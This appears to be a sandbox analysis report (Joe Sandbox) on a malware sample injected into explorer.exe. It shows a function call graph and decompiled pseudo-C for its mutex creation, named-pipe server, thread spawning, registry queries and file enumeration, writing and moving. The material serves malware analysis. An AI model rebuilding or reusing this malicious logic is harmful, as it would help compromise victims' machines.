10666->10667 10668 c85d5 2 API calls 10667->10668 10669 cb834 10668->10669 10670 c9640 2 API calls 10669->10670 10671 cb855 lstrcatW 10670->10671 10807 cc392 10671->10807 10674 cb87b 10674->10462 10676 ca48b GetLastError 10675->10676 10677 ca495 GetLastError 10675->10677 10678 ca4a2 10676->10678 10677->10678 10678->10470 10679->10486 10682 c4a41 10680->10682 10681 c4a76 10684 cb7a8 10 API calls 10681->10684 10694 c4ae2 10681->10694 10682->10681 10809 c2ba4 10682->10809 10685 c4a8d 10684->10685 10825 cb67d 10685->10825 10694->10495 10744 ce2c6 10694->10744 10746 ce2fa 10744->10746 10747 c4f40 10746->10747 11017 c8604 RtlAllocateHeap 10746->11017 11018 c4905 10746->11018 10747->10503 10747->10507 10751 c50fa 10750->10751 10752 cfc43 10750->10752 10751->10495 10762 c8604 RtlAllocateHeap 10751->10762 10753 c8669 RtlAllocateHeap 10752->10753 10754 cfc4d 10753->10754 10754->10751 10755 cfc87 10754->10755 10756 ca77d 3 API calls 10754->10756 10757 c60df 4 API calls 10755->10757 10761 cfc8e 10755->10761 10756->10755 10759 cfcac 10757->10759 10758 c861a 2 API calls 10758->10751 10759->10761 11077 cf7e3 10759->11077 10761->10758 10762->10525 10764 c903d 10763->10764 10764->10764 10765 d242d _ftol2_sse 10764->10765 10766 c9058 10765->10766 11113 c8604 RtlAllocateHeap 10785->11113 10787 c8990 10788 c89a1 lstrcpynW 10787->10788 10795 c899a 10787->10795 10789 c8a14 10788->10789 10790 c89c4 10788->10790 11114 c8604 RtlAllocateHeap 10789->11114 10792 ca6a9 6 API calls 10790->10792 10794 c89d0 10792->10794 10793 c8a1f 10793->10795 10796 c8a39 10793->10796 10799 c861a 2 API calls 10793->10799 10794->10796 10797 c8815 3 API calls 10794->10797 10795->10491 10798 c8a61 10796->10798 10802 c861a 2 API calls 10796->10802 10800 c89ea 10797->10800 10803 c861a 2 API calls 10798->10803 10799->10796 10800->10793 10801 c89f0 10800->10801 10804 c861a 2 API calls 10801->10804 10802->10798 10803->10795 10804->10795 10805->10520 10806->10506 10808 cb867 CharUpperBuffW 10807->10808 10808->10674 10810 c2bc0 10809->10810 10811 c109a RtlAllocateHeap 10810->10811 10824 c2c5c 10810->10824 10812 c2bd3 10811->10812 10813 c92e5 2 API calls 10812->10813 10814 c2be5 10813->10814 10815 c85d5 2 API calls 10814->10815 10816 c2bf0 10815->10816 10817 c109a RtlAllocateHeap 10816->10817 10818 c2bfa 10817->10818 10972 cbf37 RegOpenKeyExW 10818->10972 10821 c85d5 2 API calls 10822 c2c16 10821->10822 10823 c861a 2 API calls 10822->10823 10823->10824 10824->10681 10826 cb698 10825->10826 10827 c95c7 RtlAllocateHeap 10826->10827 10828 cb6a2 10827->10828 10829 d242d _ftol2_sse 10828->10829 10833 cb6b7 10829->10833 10830 cb6ed 10831 c85c2 2 API calls 10830->10831 10832 c4a9d 10831->10832 10835 c49c7 10832->10835 10833->10830 10834 d242d _ftol2_sse 10833->10834 10834->10833 10836 c9256 2 API calls 10835->10836 10837 c49d2 10836->10837 10838 c95e1 RtlAllocateHeap 10837->10838 10839 c49e1 10838->10839 10973 cbf6c RegQueryValueExW 10972->10973 10975 c2c08 10972->10975 10974 cbf8c 10973->10974 10973->10975 10982 c8604 RtlAllocateHeap 10974->10982 10975->10821 10977 cbf94 10977->10975 10978 cbf9e RegQueryValueExW 10977->10978 10979 cbfdd RegCloseKey 10978->10979 10980 cbfba 10978->10980 10979->10975 10982->10977 11017->10746 11019 c4928 11018->11019 11020 c4995 Sleep 11019->11020 11021 c4a0b 58 API calls 11019->11021 11020->10746 11023 c4948 11021->11023 11022 c4986 11036 c47ca 11022->11036 11023->11020 11023->11022 11026 cad44 11023->11026 11027 cad65 11026->11027 11032 cad5e 11026->11032 11028 cad79 11027->11028 11029 cad71 GetLastError 11027->11029 11030 cb998 6 API calls 11028->11030 11029->11032 11031 cad8b 11030->11031 11031->11032 11033 cadea 11031->11033 11034 cada2 memset 11031->11034 11032->11023 11035 c861a 2 API calls 11033->11035 11034->11033 11035->11032 11037 c60df 4 API calls 11036->11037 11039 c47ef 11037->11039 11038 c47fb 11038->11020 11039->11038 11040 c109a RtlAllocateHeap 11039->11040 11041 c481a 11040->11041 11042 c92e5 2 API calls 11041->11042 11043 c482c 11042->11043 11044 c85d5 2 API calls 11043->11044 11078 cf7fe 11077->11078 11079 cf883 11077->11079 11080 c109a RtlAllocateHeap 11078->11080 11081 c109a RtlAllocateHeap 11079->11081 11113->10787 11114->10793 11144 c8604 RtlAllocateHeap 11115->11144 11117 c61ef 11118 c6360 11117->11118 11145 c8604 RtlAllocateHeap 11117->11145 11118->10230 11120 c6209 11120->11118 11121 c6217 RegOpenKeyExW 11120->11121 11122 c626f 11121->11122 11129 c623a 11121->11129 11123 c6339 RegCloseKey 11122->11123 11124 c6344 11122->11124 11123->11124 11125 c861a 2 API calls 11124->11125 11126 c6352 11125->11126 11127 c861a 2 API calls 11126->11127 11127->11118 11128 c628d memset memset 11128->11129 11129->11122 11129->11128 11130 c6315 11129->11130 11131 cb1b1 13 API calls 11130->11131 11131->11129 11133 c9f95 7 API calls 11132->11133 11134 c9e87 11133->11134 11135 c9e9e 11134->11135 11136 c861a 2 API calls 11134->11136 11135->10245 11137 c8604 RtlAllocateHeap 11135->11137 11136->11135 11137->10235 11139 ca245 11138->11139 11140 c9b0e RtlAllocateHeap 11139->11140 11141 ca275 11140->11141 11142 c861a 2 API calls 11141->11142 11143 ca2da 11141->11143 11142->11143 11143->10244 11144->11117 11145->11120 11147 c9e66 7 API calls 11146->11147 11148 c5642 11147->11148 11149 c980c GetSystemTimeAsFileTime 11148->11149 11184 c56c0 11148->11184 11150 c565b 11149->11150 11151 c9f06 6 API calls 11150->11151 11152 c566f 11151->11152 11153 c9f06 6 API calls 11152->11153 11154 c5685 11153->11154 11185 ce4c1 11154->11185 11157 ca86d 5 API calls 11158 c56a4 11157->11158 11159 c56c8 CreateMutexA 11158->11159 11158->11184 11160 c56df 11159->11160 11161 c56e9 11159->11161 11192 c8604 RtlAllocateHeap 11160->11192 11193 c153b CreateMutexA 11161->11193 11166 c5715 11220 c3017 11166->11220 11184->10020 11186 ce1bc 7 API calls 11185->11186 11187 ce4d3 11186->11187 11188 ce1bc 7 API calls 11187->11188 11189 ce4ec 11188->11189 11287 ce450 11189->11287 11191 c568d 11191->11157 11192->11161 11194 c1558 CreateMutexA 11193->11194 11204 c15ad 11193->11204 11195 c156e 11194->11195 11194->11204 11196 c1080 RtlAllocateHeap 11195->11196 11197 c1578 11196->11197 11198 c91a6 RtlAllocateHeap 11197->11198 11197->11204 11199 c158c 11198->11199 11200 c85c2 2 API calls 11199->11200 11201 c1599 11200->11201 11302 c8604 RtlAllocateHeap 11201->11302 11203 c15a3 11203->11204 11303 c8604 RtlAllocateHeap 11203->11303 11208 c98ee 11204->11208 11206 c15c4 11206->11204 11207 ce1bc 7 API calls 11206->11207 11207->11204 11211 c990c 11208->11211 11209 c996c 11210 c997d 11209->11210 11308 c8604 RtlAllocateHeap 11209->11308 11213 ca471 3 API calls 11210->11213 11218 c9910 11210->11218 11211->11209 11211->11218 11304 c984a 11211->11304 11215 c99e2 CreateThread 11213->11215 11216 c9a1f 11215->11216 11217 c9a56 SetThreadPriority 11215->11217 11309 c98a6 11215->11309 11216->11218 11219 c861a 2 API calls 11216->11219 11217->11218 11218->11166 11219->11218 11221 c3025 11220->11221 11223 c302a 11220->11223 11601 cbb20 11221->11601 11224 c31c2 11223->11224 11225 cc292 6 API calls 11224->11225 11226 c31dd 11225->11226 11232 c31e6 11226->11232 11608 c8604 RtlAllocateHeap 11226->11608 11228 c31fa 11238 c3204 11228->11238 11609 cbd10 11228->11609 11231 c861a 2 API calls 11231->11232 11239 c29b1 11232->11239 11234 c3263 11615 cbc7a 11234->11615 11237 c98ee 66 API calls 11237->11238 11238->11231 11240 c9e66 7 API calls 11239->11240 11241 c29cf 11240->11241 11622 c28fb 11241->11622 11244 c28fb 3 API calls 11245 c29f8 11244->11245 11246 c9ea5 7 API calls 11245->11246 11247 c2a03 11246->11247 11248 c93be RtlAllocateHeap 11247->11248 11255 c2a4c 11247->11255 11249 c2a1b 11248->11249 11250 c2a37 11249->11250 11626 c2a53 11249->11626 11252 c94b7 2 API calls 11250->11252 11253 c2a42 11252->11253 11254 c861a 2 API calls 11253->11254 11254->11255 11256 c3bb2 11255->11256 11634 c4145 11256->11634 11258 c3c42 11260 c3be0 11262 c3bd5 11262->11258 11262->11260 11654 c38f9 11262->11654 11288 ce45e 11287->11288 11289 ce49a 11287->11289 11301 c8604 RtlAllocateHeap 11288->11301 11291 c95c7 RtlAllocateHeap 11289->11291 11293 ce4a4 11291->11293 11292 ce46f ObtainUserAgentString 11294 ce4bd 11292->11294 11295 ce487 11292->11295 11296 c91a6 RtlAllocateHeap 11293->11296 11294->11191 11297 c861a 2 API calls 11295->11297 11298 ce4b0 11296->11298 11299 ce493 11297->11299 11300 c85c2 2 API calls 11298->11300 11299->11191 11300->11294 11301->11292 11302->11203 11303->11206 11305 c9854 11304->11305 11306 c861a 2 API calls 11305->11306 11307 c9879 11305->11307 11306->11307 11307->11211 11308->11210 11310 c98ba 11309->11310 11311 c98be 11310->11311 11312 c98c2 CloseHandle 11310->11312 11318 c2eda 11312->11318 11325 c25e1 11312->11325 11330 c32a1 11312->11330 11313 c98d3 11313->11311 11314 c984a 2 API calls 11313->11314 11314->11311 11319 c2ef0 memset 11318->11319 11320 c902d _ftol2_sse 11319->11320 11321 c2f1d 11320->11321 11322 c2f52 CreateWindowExA 11321->11322 11324 c2f9b 11321->11324 11323 c2f83 ShowWindow 11322->11323 11322->11324 11323->11324 11324->11313 11345 c6da0 11325->11345 11331 c32b7 ConnectNamedPipe 11330->11331 11332 c32d0 GetLastError 11331->11332 11342 c32e1 11331->11342 11333 c34c2 11332->11333 11332->11342 11333->11313 11334 c34a8 GetLastError 11335 c34ae DisconnectNamedPipe 11334->11335 11335->11331 11335->11333 11337 c96ca memset 11337->11342 11339 c1da0 62 API calls 11339->11342 11340 cc319 RtlAllocateHeap HeapFree memset FlushFileBuffers 11340->11342 11341 c9749 SetLastError SetLastError 11341->11342 11342->11334 11342->11335 11342->11337 11342->11339 11342->11340 11342->11341 11343 c91a6 RtlAllocateHeap 11342->11343 11344 c94b7 2 API calls 11342->11344 11592 c93be 11342->11592 11598 c8604 RtlAllocateHeap 11342->11598 11343->11342 11344->11342 11346 c9ed0 7 API calls 11345->11346 11347 c6dc0 11346->11347 11348 c25e9 11347->11348 11349 c6de2 11347->11349 11373 cedcf 11347->11373 11367 c94b7 11348->11367 11351 c92e5 2 API calls 11349->11351 11359 c6dff 11351->11359 11352 ca471 3 API calls 11352->11359 11353 c6ed7 11355 c861a 2 API calls 11353->11355 11355->11348 11357 c980c GetSystemTimeAsFileTime 11357->11359 11358 c9ed0 7 API calls 11358->11359 11359->11348 11359->11352 11359->11353 11359->11357 11359->11358 11361 c6e8f 11359->11361 11382 cb269 GetFileAttributesW 11359->11382 11383 cf14f 11359->11383 11396 ca4ef 11359->11396 11403 c1c68 11359->11403 11361->11359 11362 c980c GetSystemTimeAsFileTime 11361->11362 11363 cb1b1 13 API calls 11361->11363 11365 c9640 2 API calls 11361->11365 11362->11361 11363->11361 11366 c6eac MoveFileW 11365->11366 11366->11359 11370 c25f4 11367->11370 11371 c94c8 11367->11371 11368 c94fa 11369 c861a 2 API calls 11368->11369 11369->11370 11370->11313 11371->11368 11371->11370 11372 c861a 2 API calls 11371->11372 11372->11371 11374 c95e1 RtlAllocateHeap 11373->11374 11375 cede1 11374->11375 11376 c9256 2 API calls 11375->11376 11377 cedee 11376->11377 11378 cee0f 11377->11378 11379 c92e5 2 API calls 11377->11379 11378->11349 11380 cee04 11379->11380 11381 c85d5 2 API calls 11380->11381 11381->11378 11382->11359 11418 cefe9 11383->11418 11387 c861a 2 API calls 11388 cf236 11387->11388 11388->11359 11389 cf186 11390 ca5f7 CreateFileW 11389->11390 11395 cf228 11389->11395 11391 cf1f8 11390->11391 11392 ca65c WriteFile 11391->11392 11393 cf20a 11391->11393 11392->11393 11394 c861a 2 API calls 11393->11394 11394->11395 11395->11387 11397 c95e1 RtlAllocateHeap 11396->11397 11398 ca4fe 11397->11398 11521 cb269 GetFileAttributesW 11398->11521 11400 ca508 11401 c85d5 2 API calls 11400->11401 11402 ca513 11401->11402 11402->11359 11408 c1c83 11403->11408 11404 c1ce8 11405 ca6a9 6 API calls 11404->11405 11407 c1d06 11405->11407 11406 c980c GetSystemTimeAsFileTime 11406->11408 11409 c1d1a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 11407->11409 11413 c1d10 11407->11413 11408->11404 11408->11406 11417 c1d15 11408->11417 11410 c980c GetSystemTimeAsFileTime 11409->11410 11411 c1d46 11410->11411 11522 c1a1b 11411->11522 11415 c861a 2 API calls 11413->11415 11415->11417 11416 c9f06 6 API calls 11416->11413 11417->11359 11419 cf015 11418->11419 11420 c95e1 RtlAllocateHeap 11419->11420 11422 cf06e 11419->11422 11421 cf023 11420->11421 11423 c92e5 2 API calls 11421->11423 11424 c95e1 RtlAllocateHeap 11422->11424 11447 cf0e1 11422->11447 11425 cf03a 11423->11425 11427 cf092 11424->11427 11428 c85d5 2 API calls 11425->11428 11426 caeb4 18 API calls 11429 cf0fe 11426->11429 11430 c92e5 2 API calls 11427->11430 11431 cf048 11428->11431 11432 c92e5 2 API calls 11429->11432 11434 cf0ad 11430->11434 11431->11422 11458 caeb4 11431->11458 11433 cf11d 11432->11433 11444 cf13c 11433->11444 11471 cef2e 11433->11471 11435 c85d5 2 API calls 11434->11435 11440 cf0bb 11435->11440 11443 caeb4 18 API calls 11440->11443 11440->11447 11441 c861a 2 API calls 11441->11422 11442 c861a 2 API calls 11442->11444 11445 cf0d3 11443->11445 11444->11388 11448 cf6c0 11444->11448 11446 c861a 2 API calls 11445->11446 11446->11447 11447->11426 11480 c8604 RtlAllocateHeap 11448->11480 11450 cf6e0 11457 cf778 11450->11457 11481 d4410 11450->11481 11452 c861a 2 API calls 11453 cf796 11452->11453 11453->11389 11455 c8698 3 API calls 11456 cf70b 11455->11456 11456->11455 11456->11457 11484 d3830 11456->11484 11457->11452 11459 c92e5 RtlAllocateHeap lstrcatW 11458->11459 11460 caecf 11459->11460 11461 cb00b 11460->11461 11462 caedd FindFirstFileW 11460->11462 11461->11441 11465 caff7 11462->11465 11470 caef6 11462->11470 11463 c861a HeapFree memset 11463->11461 11464 cafde FindNextFileW 11464->11465 11464->11470 11465->11463 11466 c92e5 RtlAllocateHeap lstrcatW 11466->11470 11467 cefaa 16 API calls 11467->11470 11468 caeb4 16 API calls 11468->11470 11469 c861a HeapFree memset 11469->11470 11470->11464 11470->11466 11470->11467 11470->11468 11470->11469 11472 cee1c 6 API calls 11471->11472 11473 cef49 11472->11473 11474 cef50 11473->11474 11475 cb1b1 13 API calls 11473->11475 11474->11442 11476 cef5c 11475->11476 11477 c8698 RtlAllocateHeap HeapFree memset 11476->11477 11478 cef71 11476->11478 11477->11478 11479 c861a HeapFree memset 11478->11479 11479->11474 11480->11450 11482 d41d0 memset 11481->11482 11483 d442c 11482->11483 11483->11456 11485 d3841 11484->11485 11486 d4af0 memcpy 11485->11486 11487 d38ea 11485->11487 11491 d389e 11485->11491 11486->11491 11487->11456 11491->11487 11493 d3908 11491->11493 11507 d4af0 memcpy 11491->11507 11493->11487 11507->11493 11521->11400 11523 c1a3c 11522->11523 11525 c1a82 11522->11525 11541 c9ea5 11523->11541 11524 c1aac 11532 c1ab4 11524->11532 11559 c1778 11524->11559 11525->11524 11548 c160d 11525->11548 11530 c9e66 7 API calls 11535 c1a50 11530->11535 11532->11413 11532->11416 11533 c861a 2 API calls 11533->11525 11540 c1a6e 11535->11540 11544 c96ca 11535->11544 11540->11533 11542 c9f95 7 API calls 11541->11542 11543 c1a44 11542->11543 11543->11530 11545 c96d6 11544->11545 11546 c96fb 11545->11546 11547 c96ef memset 11545->11547 11546->11540 11547->11546 11549 c980c GetSystemTimeAsFileTime 11548->11549 11550 c1628 11549->11550 11551 c980c GetSystemTimeAsFileTime 11550->11551 11552 c1630 11551->11552 11553 c98ee 66 API calls 11552->11553 11554 c1655 11553->11554 11555 c16a0 11554->11555 11556 c980c GetSystemTimeAsFileTime 11554->11556 11558 c165d 11554->11558 11557 c984a HeapFree memset 11555->11557 11556->11554 11557->11558 11558->11524 11560 c9f95 7 API calls 11559->11560 11561 c17c0 11560->11561 11562 c17dd 11561->11562 11564 c16ee RtlAllocateHeap HeapFree memset 11561->11564 11563 c861a HeapFree memset 11562->11563 11565 c17f3 11563->11565 11564->11562 11566 c1080 RtlAllocateHeap 11565->11566 11567 c17fd 11566->11567 11568 ca51a RtlAllocateHeap _ftol2_sse 11567->11568 11569 c1818 11568->11569 11594 c93d2 11592->11594 11599 c8604 RtlAllocateHeap 11594->11599 11595 c94a1 11595->11342 11597 c942a 11597->11595 11600 c8604 RtlAllocateHeap 11597->11600 11598->11342 11599->11597 11600->11597 11602 cbb37 11601->11602 11603 cbb56 11602->11603 11604 c95e1 RtlAllocateHeap 11602->11604 11603->11223 11605 cbb65 lstrcmpiW 11604->11605 11606 cbb7b 11605->11606 11607 c85d5 2 API calls 11606->11607 11607->11603 11608->11228 11613 cbd5e 11609->11613 11610 cbde8 SetEntriesInAclA 11611 cbdfe LocalAlloc 11610->11611 11612 c3210 CreateNamedPipeA 11610->11612 11611->11612 11614 cbe0e 11611->11614 11612->11234 11612->11238 11613->11610 11613->11612 11614->11612 11616 c95e1 RtlAllocateHeap 11615->11616 11620 cbca0 11616->11620 11617 cbcf3 11618 c85d5 2 API calls 11617->11618 11619 c3268 11618->11619 11619->11237 11620->11617 11621 cbcd9 SetSecurityInfo 11620->11621 11621->11617 11623 c2905 11622->11623 11625 c291c 11622->11625 11624 c8698 3 API calls 11623->11624 11624->11625 11625->11244 11627 c2a5f 11626->11627 11628 c2a6a atol 11627->11628 11633 c2a65 11627->11633 11629 c2a81 11628->11629 11630 c9749 2 API calls 11629->11630 11629->11633 11631 c2a97 11630->11631 11632 c9749 2 API calls 11631->11632 11632->11633 11633->11249 11679 c378c 11634->11679 11637 c896f 7 API calls 11638 c418c 11637->11638 11639 c8a90 3 API calls 11638->11639 11645 c4197 11638->11645 11640 c41b3 11639->11640 11640->11645 11685 c8604 RtlAllocateHeap 11640->11685 11641 c4397 11644 c861a 2 API calls 11641->11644 11643 c8cc0 6 API calls 11643->11641 11646 c43a2 11644->11646 11645->11641 11645->11643 11646->11262 11647 c4356 11647->11645 11648 c93be RtlAllocateHeap 11652 c4201 11648->11652 11650 c9749 SetLastError SetLastError 11650->11652 11651 c8669 RtlAllocateHeap 11651->11652 11652->11645 11652->11647 11652->11648 11652->11650 11652->11651 11653 c94b7 HeapFree memset 11652->11653 11653->11652 11680 c37b6 11679->11680 11686 c90a5 11680->11686 11683 c92e5 2 API calls 11684 c3816 11683->11684 11684->11637 11685->11652 11687 c902d _ftol2_sse 11686->11687 11688 c37ea 11687->11688 11688->11683

        Executed Functions

        Function 000C31C2, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E000C31C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0xde688; // 0xf0000
				_t10 = E000CC292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E000C8604(0x80000); // executed
					 *0xde724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E000CBD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0xde674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E000CBC7A( &_v20, _t38); // executed
							_t18 = E000C98EE(E000C32A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0xde684; // 0x64f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0xde674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0xde674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E000C861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}
















        0x000c31c2
        0x000c31c8
        0x000c31d8
        0x000c31dd
        0x000c31df
        0x000c31e4
        0x000c31f5
        0x000c31fa
        0x000c3200
        0x000c3202
        0x000c320b
        0x000c3210
        0x000c3213
        0x000c3215
        0x000c3217
        0x000c3219
        0x000c321a
        0x000c321a
        0x000c3227
        0x000c322a
        0x000c322f
        0x000c3249
        0x000c324f
        0x000c3254
        0x000c3257
        0x000c3263
        0x000c3271
        0x000c3278
        0x000c327a
        0x00000000
        0x00000000
        0x000c327c
        0x000c3287
        0x000c328a
        0x00000000
        0x000c3259
        0x000c3259
        0x000c325f
        0x000c328c
        0x000c328c
        0x000c328d
        0x000c3293
        0x00000000
        0x000c329c
        0x000c3257
        0x000c3204
        0x00000000
        0x000c3204
        0x00000000

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
        • Instruction ID: d13159e9ccd9f4dddc0a4346f52e0233d29fb46ca893f90048703841fd8101b3
        • Opcode Fuzzy Hash: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
        • Instruction Fuzzy Hash: 6D21F8726051119AEB10BBB8EC45FAE37A8EB55374F20432EF525D71D1DE3085008761
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5A61, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C5A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E000C5A06);
				E000C5631(_t6, _t7); // executed
				return 0;
			}






        0x000c5a61
        0x000c5a6d
        0x000c5a73
        0x000c5a7a

        APIs
        • RtlAddVectoredExceptionHandler.NTDLL(00000001,000C5A06,000C5CE8), ref: 000C5A6D
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ExceptionHandlerVectored
        • String ID:
        • API String ID: 3310709589-0
        • Opcode ID: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
        • Instruction ID: c73ec1648ac1b9eac1dd2e70802dc4e625edaa9747ea1c085a3dbdbdc41907be
        • Opcode Fuzzy Hash: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
        • Instruction Fuzzy Hash: DBB092742515405BD640AB60CC8AF8C32909B64742F0100A4B2468A0F3CAE0A4C06612
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C4A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 79%
        			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0xde688; // 0xf0000
					_t125 =  *0xde68c; // 0x64fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E000CBB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E000CB7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E000CB67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
					E000CB88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000C92E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000C91E3(_v1112);
								_t145 = _t130;
								 *0xde740 = _t76;
								 *0xde738 = E000C91E3(_t145);
								L17:
								_push(_t145);
								_t80 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0xdb9ca);
								E000C9F48(0xe); // executed
								E000C9F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E000CA0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E000CA3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E000CA3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E000C980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E000CA0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0xde688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E000CE23E(_t183);
										}
										E000C52C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0xde688; // 0xf0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E000C109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000C85D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xf0228
									_t153 = _t51;
									L25:
